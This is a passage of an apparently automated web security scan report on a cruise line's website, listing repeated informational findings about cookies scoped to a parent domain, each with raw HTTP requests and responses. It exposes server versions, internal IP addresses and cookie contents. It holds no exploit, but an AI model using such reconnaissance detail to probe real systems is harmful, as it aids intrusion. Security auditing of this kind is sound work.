Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:45 GMT
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:45 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:45 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.62. http://www2.ncl.com/destination/panama_canal/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:31 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:31 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:31 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:31 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.63. http://www2.ncl.com/destination/panama_canal/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:39 GMT
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:39 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:39 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:39 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.64. http://www2.ncl.com/destination/panama_canal/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:08:02 GMT
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:08:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:08:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:08:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.65. http://www2.ncl.com/destination/panama_canal/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/panama_canal/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:56 GMT
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:56 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:56 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:56 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.66. http://www2.ncl.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /faq

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645036-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Content-Length: 83104

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.67. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/bon-voyage-gifts

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/bon-voyage-gifts HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317637516-1"
Last-Modified: Mon, 03 Oct 2011 10:25:16 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Content-Length: 60158

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.68. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/casinos-at-sea/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/casinos-at-sea/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 43284

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.69. http://www2.ncl.com/freestyle-cruise/cruise-rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/cruise-rewards

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/cruise-rewards HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317635166-1"
Last-Modified: Mon, 03 Oct 2011 09:46:06 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Content-Length: 40322

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.70. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-accommodations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-accommodations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317633066-1"
Last-Modified: Mon, 03 Oct 2011 09:11:06 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:45 GMT; path=/; domain=ncl.com
Content-Length: 43374

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.71. http://www2.ncl.com/freestyle-cruise/freestyle-dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-dining

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-dining HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317632141-1"
Last-Modified: Mon, 03 Oct 2011 08:55:41 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:43 GMT; path=/; domain=ncl.com
Content-Length: 47025

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.72. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-family-fun/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/freestyle-family-fun/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 11:29:26 +0000
ETag: "1317641366-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Content-Length: 46071

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.73. http://www2.ncl.com/freestyle-cruise/golf/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/golf/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/golf/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633060-1"
Last-Modified: Mon, 03 Oct 2011 09:11:00 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Content-Length: 44665

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.74. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/hawaii-cruise-and-hotel-packages

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/hawaii-cruise-and-hotel-packages HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317631959-1"
Last-Modified: Mon, 03 Oct 2011 08:52:39 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Content-Length: 46432
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.75. http://www2.ncl.com/freestyle-cruise/nickelodeon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/nickelodeon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/nickelodeon HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317630718-1"
Last-Modified: Mon, 03 Oct 2011 08:31:58 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Content-Length: 43466

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.76. http://www2.ncl.com/freestyle-cruise/onboard-experience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/onboard-experience

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/onboard-experience HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317630975-1"
Last-Modified: Mon, 03 Oct 2011 08:36:15 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 48855

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.77. http://www2.ncl.com/freestyle-cruise/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317634785-1"
Last-Modified: Mon, 03 Oct 2011 09:39:45 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 43089

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.78. http://www2.ncl.com/freestyle-cruise/spa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/spa HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317640158-1"
Last-Modified: Mon, 03 Oct 2011 11:09:18 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Content-Length: 56334

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.79. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa-sports-and-fitness

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/spa-sports-and-fitness HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633921-1"
Last-Modified: Mon, 03 Oct 2011 09:25:21 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Content-Length: 41946

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.80. http://www2.ncl.com/ncl_inside_scoop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /ncl_inside_scoop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ncl_inside_scoop HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
